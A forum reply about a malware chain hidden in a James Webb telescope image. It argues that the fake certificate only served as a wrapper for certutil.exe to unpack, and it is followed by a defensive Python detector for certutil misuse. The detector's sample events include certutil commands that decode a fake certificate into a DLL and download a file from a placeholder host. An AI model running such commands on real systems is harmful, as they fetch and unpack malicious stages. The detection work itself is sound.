Reply to post: Social engineering as part of the exe chain?

Oh no, that James Webb Space Telescope snap might actually contain malware

that one in the corner Silver badge

Social engineering as part of the exe chain?

As I read the article, I think you have just fallen into a trap the bad guys set:

"There is a certificate involved, blame the OS for not protecting you"

or similar feelings expressed about the use of a JPEG...

The "certificate" was just used as a wrapper, so that if you spotted the download you'd not be suspicious. Then you'd see certutil.exe run: ok, what else would you use with a certificate? But it was just used to extract the next link in the chain.

(Similarly, the JPEG, abused to innocently carry a link in the chain)

At no point is the "certificate" intended to be handed 'properly' to the OS and hence, as you hoped, be validated: to the OS it is just another piece of downloaded stuff.

Now, you *could* demand that the OS examine every bit of data and validate it before letting any other process access it: now you have either invented the malware scanner or have effectively switched on autorun for everything that is ever downloaded (because you know full well that, for example, detecting that a file is "a certificate" and then running some autovalidation on it means another vulnerability will be found and the fake certs designed to exploit that).

But because of your reaction to the fact one link used a certificate, the bad guys now have you wasting time and energy talking about that - and, who knows, enough people follow suit and pressure OS writers, who add in the autorun scenario "as an extra precaution" (aka to be seen to be doing something) and bingo, attack surfaces grow and grow...
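An added defender's-eye illustration of the point above (example code, not the article's or the commenter's): because the OS never gets handed the "certificate" to validate, the useful signal is certutil.exe being run as a decoder or downloader rather than as a certificate tool. The script assumes Sysmon-style (parent image, command line) records and a made-up baseline of expected parent processes; the sample events and file names are constructed placeholders.

```python
import re
import shlex

# Real certutil switches that make it a decoder/downloader rather than a
# certificate tool; this is the misuse the post describes.
DECODE_SWITCHES = {"-decode", "-decodehex", "-encode", "-urlcache"}
CERT_EXTS = {".cer", ".crt", ".der", ".pem", ".p7b", ".pfx", ".p12"}
# Assumed baseline of parents that legitimately launch certutil; tune per environment.
EXPECTED_PARENTS = {"mmc.exe", "certmgr.exe", "services.exe", "msiexec.exe"}

def _basename(s: str) -> str:
    return re.split(r"[\\/]", s.strip('"'))[-1]

def _ext(operand: str) -> str:
    name = _basename(operand)
    return "." + name.rsplit(".", 1)[1].lower() if "." in name else ""

def suspicious_certutil(parent_image: str, command_line: str) -> list[str]:
    """Reasons this process-creation record looks like certutil unwrapping a
    stage, or [] if it is not certutil or is ordinary certificate/admin work."""
    try:
        argv = shlex.split(command_line, posix=False)  # keep Windows backslashes
    except ValueError:
        return ["unparseable command line"]
    if not argv or _basename(argv[0]).lower() not in {"certutil", "certutil.exe"}:
        return []
    switches = {"-" + a.lstrip("-/").lower() for a in argv[1:] if a.startswith(("-", "/"))}
    operands = [a.strip('"') for a in argv[1:] if not a.startswith(("-", "/"))]
    hit = switches & DECODE_SWITCHES
    if not hit:  # -verify, -addstore, -hashfile and similar are normal use
        return []
    reasons = [f"decode/download switch {sorted(hit)}"]
    odd = [o for o in operands if _ext(o) and _ext(o) not in CERT_EXTS]
    if odd:
        reasons.append(f"non-certificate operand(s) {odd}")
    if parent_image.lower() not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent {parent_image}")
    return reasons

# Constructed sample records (parent image, command line); all names are placeholders.
SAMPLE_EVENTS = [
    ("chrome.exe", r'certutil.exe -decode "C:\Users\u\Downloads\fake_cert_example.cer" "C:\Users\u\AppData\Local\Temp\stage2_example.dll"'),
    ("cmd.exe", r"certutil -urlcache -split -f http://example.invalid/image_example.jpg C:\Temp\image_example.jpg"),
    ("mmc.exe", r"certutil.exe -addstore Root C:\certs\corp-root-example.cer"),
    ("cmd.exe", r"certutil.exe -hashfile C:\tools\installer_example.exe SHA256"),
]

def scan(events=SAMPLE_EVENTS) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every flagged record."""
    return [(i, r) for i, (p, c) in enumerate(events) if (r := suspicious_certutil(p, c))]
```

Only the first two sample events are flagged; the store import and the file hash are left alone because the switch, not the file extension, is what distinguishes decoding a wrapper from real certificate work.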
